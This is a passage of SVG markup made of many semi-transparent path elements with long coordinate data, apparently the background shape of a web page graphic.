transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,